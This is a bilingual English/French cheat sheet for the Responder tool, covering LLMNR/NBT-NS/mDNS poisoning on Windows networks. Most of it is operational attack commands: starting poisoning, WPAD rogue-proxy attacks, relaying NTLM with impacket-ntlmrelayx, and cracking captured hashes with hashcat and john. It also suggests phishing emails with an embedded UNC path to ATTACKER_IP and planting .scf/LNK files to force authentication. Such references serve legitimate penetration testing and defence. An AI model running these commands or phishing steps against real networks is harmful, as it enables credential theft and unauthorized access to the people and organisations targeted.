responder
Empoisonneur LLMNR/NBT-NS/mDNS et outil de capture d'identifiants. Intercepte les diffusions de résolution de noms Windows pour capturer des hashes NTLMv1/v2 et relayer des identifiants pour un accès réseau non autorisé. LLMNR/NBT-NS/mDNS poisoner and credential capture tool. Intercepts Windows name resolution broadcasts to capture NTLMv1/v2 hashes and relay credentials for unauthorized network access.
↗ https://github.com/lgandx/ResponderOverview
Responder poisons LLMNR, NBT-NS, and mDNS queries on Windows networks to capture NTLMv1/v2 challenge-response hashes. When a Windows machine tries to resolve a hostname that doesn’t exist, Responder responds and captures the resulting authentication hash — crackable offline or relayable to other services.
Basic Usage
Start Responder on a network interface
sudo responder -I eth0
Analyze mode (listen without poisoning)
sudo responder -I eth0 -A
With WPAD attack (proxy auto-config phishing)
sudo responder -I eth0 -w
Verbose mode
sudo responder -I eth0 -v
Configuration
# Configuration file: /etc/responder/Responder.conf
# Toggle individual servers on/off:
# SMB = On
# HTTP = On
# HTTPS = On
# SQL = On
# FTP = On
# etc.
# Disable SMB server to allow relay (when using ntlmrelayx)
# In Responder.conf: SMB = Off, HTTP = Off
Hash Capture
Hashes are saved to:
ls /usr/share/responder/logs/
→ SMB-NTLMv2-SSP-192.168.1.100.txt HTTP-NTLMv2-192.168.1.50.txt
View captured hashes
cat /usr/share/responder/logs/*.txt
# Crack NTLMv2 hashes
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
NTLM Relay Setup
Step 1: Turn off SMB in Responder.conf (so ntlmrelayx can handle it) Step 2: Start ntlmrelayx targeting non-signing hosts
impacket-ntlmrelayx -tf targets.txt -smb2support
Step 3: Start Responder
sudo responder -I eth0
# Any Windows auth to a non-existent host will relay to targets
WPAD Attack
# WPAD: Web Proxy Auto-Detection
# Windows clients broadcast for "wpad.domain.local" automatically
# Responder answers and serves a WPAD config
# Client authenticates to fetch config — captures hash
sudo responder -I eth0 -w -v
→ All clients looking for WPAD will authenticate to Responder
Trigger Authentication
# Wait for organic traffic, or trigger manually:
# Point to UNC path that doesn't resolve
# \\ + any hostname → triggers LLMNR/NBT-NS lookup
# Send phishing email with UNC path embedded
# <img src="\\ATTACKER_IP\image.jpg">
# Place .scf, .url, or LNK file in accessed file shares
# → Windows auto-resolves the UNC path
Tips
- Run Responder for 30-60 minutes during active business hours for best results
- LLMNR/NBT-NS poisoning works on local subnet only — must be on same network
- NTLMv1 hashes crack much faster than NTLMv2 — check which version is captured
- Use
-A(analyze) mode first to see what traffic exists before poisoning - For relay attacks: prefer impacket-ntlmrelayx over cracking when targets don’t require signing
Help / Man page
responder [options]
-I IFACE Network interface (required)
-A Analyze mode (no poisoning)
-w Enable WPAD rogue proxy server
-v Verbose
-F Force NTLM authentication
-P Force proxy auth for WPAD
-b Basic auth for WPAD (gets cleartext)
Config: /etc/responder/Responder.conf
Logs: /usr/share/responder/logs/
Vue d’ensemble
Responder empoisonne les requêtes LLMNR, NBT-NS et mDNS sur les réseaux Windows pour capturer des hashes de challenge-response NTLMv1/v2. Quand une machine Windows essaie de résoudre un nom d’hôte qui n’existe pas, Responder répond et capture le hash d’authentification résultant : crackable hors-ligne ou relayable vers d’autres services.
Utilisation basique
# Démarrer Responder sur une interface réseau
sudo responder -I eth0
# Mode analyse (écouter sans empoisonner)
sudo responder -I eth0 -A
# Avec l'attaque WPAD (phishing de la configuration automatique de proxy)
sudo responder -I eth0 -w
# Mode verbeux
sudo responder -I eth0 -v
Configuration
# Fichier de configuration : /etc/responder/Responder.conf
# Activer/désactiver les serveurs individuels :
# SMB = On
# HTTP = On
# HTTPS = On
# SQL = On
# FTP = On
# etc.
# Désactiver le serveur SMB pour permettre le relais (en utilisant ntlmrelayx)
# Dans Responder.conf : SMB = Off, HTTP = Off
Capture de hashes
Les hashes sont sauvegardés dans :
ls /usr/share/responder/logs/
→ SMB-NTLMv2-SSP-192.168.1.100.txt HTTP-NTLMv2-192.168.1.50.txt
Afficher les hashes capturés
cat /usr/share/responder/logs/*.txt
# Casser les hashes NTLMv2
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Mise en place du relais NTLM
Étape 1 : désactiver SMB dans Responder.conf (pour que ntlmrelayx puisse le gérer). Étape 2 : démarrer ntlmrelayx en ciblant les hôtes sans signature
impacket-ntlmrelayx -tf targets.txt -smb2support
Étape 3 : démarrer Responder
sudo responder -I eth0
# Toute authentification Windows vers un hôte inexistant sera relayée vers les cibles
Attaque WPAD
# WPAD : Web Proxy Auto-Detection
# Les clients Windows diffusent automatiquement une requête pour "wpad.domain.local"
# Responder répond et sert une config WPAD
# Le client s'authentifie pour récupérer la config : le hash est capturé
sudo responder -I eth0 -w -v
→ Tous les clients recherchant le WPAD s’authentifieront auprès de Responder
Déclencher l’authentification
# Attendre du trafic organique, ou déclencher manuellement :
# Pointer vers un chemin UNC qui ne se résout pas
# \\ + n'importe quel nom d'hôte → déclenche une résolution LLMNR/NBT-NS
# Envoyer un email de phishing avec un chemin UNC intégré
# <img src="\\ATTACKER_IP\image.jpg">
# Placer un fichier .scf, .url, ou LNK dans des partages de fichiers accédés
# → Windows résout automatiquement le chemin UNC
Conseils
- Faire tourner Responder pendant 30 à 60 minutes durant les heures d’activité pour de meilleurs résultats
- L’empoisonnement LLMNR/NBT-NS ne fonctionne que sur le sous-réseau local : il faut être sur le même réseau
- Les hashes NTLMv1 se cassent bien plus vite que les NTLMv2 : vérifier quelle version a été capturée
- Utiliser le mode
-A(analyse) d’abord pour voir quel trafic existe avant d’empoisonner - Pour les attaques de relais : préférer impacket-ntlmrelayx au cracking quand les cibles ne requièrent pas de signature
Aide / Page de manuel
responder [options]
-I IFACE Network interface (required)
-A Analyze mode (no poisoning)
-w Enable WPAD rogue proxy server
-v Verbose
-F Force NTLM authentication
-P Force proxy auth for WPAD
-b Basic auth for WPAD (gets cleartext)
Config: /etc/responder/Responder.conf
Logs: /usr/share/responder/logs/